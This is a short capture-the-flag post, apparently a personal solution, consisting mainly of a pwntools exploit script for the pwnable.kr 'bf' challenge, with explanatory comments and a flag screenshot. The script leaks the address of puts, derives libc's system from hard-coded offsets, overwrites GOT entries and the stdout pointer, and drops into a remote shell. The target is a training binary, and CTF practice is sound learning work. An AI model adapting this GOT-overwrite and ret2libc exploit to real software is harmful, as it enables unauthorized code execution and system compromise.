write-up 귀찮다.
Exploit Code
# Exploit script for the pwnable.kr "bf" challenge (CTF training target).
#
# Flow, as the code below shows it:
#   1. connect to pwnable.kr:9001 (or a local ./bf process via the commented line);
#   2. send one command string built from ',' '>' '<' '.' '[' — the binary is
#      named bf, so these look like Brainfuck tape commands (not verifiable here);
#   3. interactively feed the bytes that each ',' in that string reads, and
#      read back the 4 bytes that the '.' commands print to leak puts's address;
#   4. derive libc_base/system from hard-coded offsets and send the final values.
#
# NOTE(review): every address and offset in this file (0x804a0a0, 0x8048694,
# 0x5fca0, 0x3ada0) is specific to the challenge binary and the libc build on
# the remote host; the script silently produces wrong values if either differs.
# NOTE(review): payloads are str, not bytes — looks written for Python 2
# pwntools; under Python 3 the send()/sendlineafter() arguments would need
# to be bytes. Confirm before reuse.
from pwn import *
#p=process('./bf')
p=remote('pwnable.kr', 9001)
# Step 1 of the command string: seven ',' reads store "/bin/sh\0" at the tape
# start (0x804a0a0 per the comment); the seven '<' return the pointer to it.
# write "/bin/sh" in 0x804a0a0
payload = ',>,>,>,>,>,>,>,<<<<<<<'
# Move 0x20 cells back and read one byte; the byte sent later at the
# "p -> puts_got" step is what this ',' consumes.
# p -> puts_got
payload += '<'*0x20+','
# Three '.' commands print 3 bytes (4 with the 4th read below) that the
# script later receives as puts_addr.
# leak puts_addr
payload += '.>.>.>.<<<'
# Four ',' reads overwrite the 4-byte entry with the value sent later.
# puts_got -> main
payload += ',>,>,>,<<<'
# p -> setvbuf_got
payload += '>'*0x10
# setvbuf_got -> system
payload += ',>,>,>,<<<'
# p -> stdout
payload += '>'*0x38
# stdout -> addr of "/bin/sh"
payload += ',>,>,>,<<<'
# call puts_got
payload += '['
# The program prints a banner ending in ']' before reading input — the
# command string is sent only after that prompt.
p.sendlineafter(']\n', payload)
# From here on, each send() supplies the bytes the ',' commands above read,
# in the same order they appear in the command string.
p.send('/bin/sh\x00')
log.info('0x804a0a0 : "/bin/sh"')
# The 1s sleeps keep successive sends from being merged into one read on the
# remote side; the script has no other synchronisation, so this is fragile.
sleep(1)
p.send('\x18') # p -> puts_got
log.info('p -> puts_got')
sleep(1)
# Little-endian 32-bit address printed by the '.' commands.
puts_addr = u32(p.recv(4))
log.info('puts addr : '+hex(puts_addr))
# Hard-coded offsets of puts and system inside the remote libc (see NOTE above).
libc_base = puts_addr-0x5fca0
log.info('libc base : '+hex(libc_base))
system = libc_base+0x3ada0
log.info('system : '+hex(system))
# 0x8048694 is a fixed address in the non-PIE challenge binary (labelled main here).
p.send(p32(0x8048694)) # puts_got -> main
log.info("puts_got -> main")
sleep(1)
p.send(p32(system))
log.info("setvbuf_got -> system")
sleep(1)
p.send(p32(0x804a0a0))
log.info('stdout -> addr of "/bin/sh"')
log.info("Success!")
# Hand the connection over to the user for the remaining interaction.
p.interactive()
Capture the Flag
![image](https://user-images.githubusercontent.com/52568230/74329373-05dc8e00-4dd3-11ea-8474-45be7d714e21.png)